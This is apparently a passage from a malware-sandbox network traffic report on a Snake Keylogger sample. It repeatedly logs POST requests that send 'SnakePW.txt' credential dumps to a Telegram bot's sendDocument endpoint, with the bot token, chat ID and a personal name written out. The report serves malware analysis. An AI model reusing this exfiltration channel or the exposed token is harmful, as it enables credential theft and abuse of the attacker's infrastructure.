                                                                    2022-06-26 07:34:51 UTC527OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 65 66 38 30 64 30 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da57571ef80d03Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:51 UTC527INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:51 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:51 UTC528INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 31 30 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 39 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67100,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228891,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    313192.168.2.550248149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:51 UTC528OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da57571f314595
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:51 UTC528OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 66 33 31 34 35 39 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da57571f314595Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:52 UTC529INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:52 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:52 UTC529INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 31 30 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 39 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67101,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228892,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    314192.168.2.550249149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:52 UTC530OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da57571f6a7df8
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:52 UTC530OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 66 36 61 37 64 66 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da57571f6a7df8Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:52 UTC531INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:52 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:52 UTC531INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 31 30 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 39 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67102,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228892,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    315192.168.2.550250149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:52 UTC531OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da57571fa618cf
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:52 UTC532OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 66 61 36 31 38 63 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da57571fa618cfContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:53 UTC532INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:52 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:53 UTC533INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 31 30 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 39 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67103,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228892,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    316192.168.2.550251149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:53 UTC533OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da57571fdf51fa
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:53 UTC533OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 66 64 66 35 31 66 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da57571fdf51faContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    32192.168.2.549802149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:32:51 UTC54OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756dc108764
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:32:51 UTC54OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 63 31 30 38 37 36 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756dc108764Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:32:51 UTC54INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:32:51 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:32:51 UTC55INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 37 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 37 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66779,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228771,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    33192.168.2.549803149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:32:51 UTC55OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756dc4756f0
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:32:51 UTC56OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 63 34 37 35 36 66 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756dc4756f0Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:32:52 UTC56INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:32:52 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:32:52 UTC56INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 38 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 37 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66780,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228772,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    34192.168.2.549804149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:32:52 UTC57OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756dc82f3cd
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:32:52 UTC57OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 63 38 32 66 33 63 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756dc82f3cdContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:32:52 UTC58INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:32:52 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
